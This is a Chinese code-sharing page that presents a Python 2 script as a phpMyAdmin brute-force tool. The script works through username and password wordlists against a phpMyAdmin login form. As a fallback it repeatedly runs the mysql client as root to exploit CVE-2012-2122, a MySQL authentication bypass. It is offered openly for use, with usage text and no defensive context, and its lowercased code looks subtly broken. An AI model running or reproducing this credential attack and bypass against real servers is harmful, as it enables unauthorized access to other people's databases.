Python写的PHPMyAdmin暴力破解工具代码
程序员文章站
2022-06-03 09:25:26
phpmyadmin暴力破解,加上cve-2012-2122 mysql authentication bypass vulnerability漏洞利用。
#!/...
phpmyadmin暴力破解,加上cve-2012-2122 mysql authentication bypass vulnerability漏洞利用。
#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def crack(url,username,password): opener = urllib2.build_opener(urllib2.httpcookieprocessor(cookielib.lwpcookiejar())) headers = {'user-agent' : 'mozilla/5.0 (windows nt 6.1; wow64)'} params = urllib.urlencode({'pma_username': username, 'pma_password': password}) request = urllib2.request(url+"/index.php", params,headers) response = opener.open(request) a=response.read() if a.find('database server')!=-1 and a.find('name="login_form"')==-1: return username,password return 0 def mysqlauthenticationbypasscheck(host,port): i=0 while i<300: i=i+1 subprocess.popen("mysql --host=%s -p %s -uroot -piswin" % (host,port),shell=true).wait() if __name__ == '__main__': if len(sys.argv)<4: print "#author:iswin\n#useage python pma.py //www.jb51.net/phpmyadmin/ username.txt password.txt" sys.exit() print "bruting,pleas wait..." for name in open(sys.argv[2],"r"): for passw in open(sys.argv[3],"r"): state=crack(sys.argv[1],name,passw) if state!=0: print "\nbrute successful" print "username: "+state[0]+"password: "+state[1] sys.exit() print "sorry,brute failed...,try to use mysqlauthenticationbypasscheck" choice=raw_input('warning:this function needs mysql environment.\ny:try to mysqlauthenticationbypasscheck\nothers:exit\n') if choice=='y' or choice=='y': host=raw_input('host:') port=raw_input('port:') mysqlauthenticationbypasscheck(host,port)
上一篇: python局域网ip扫描示例分享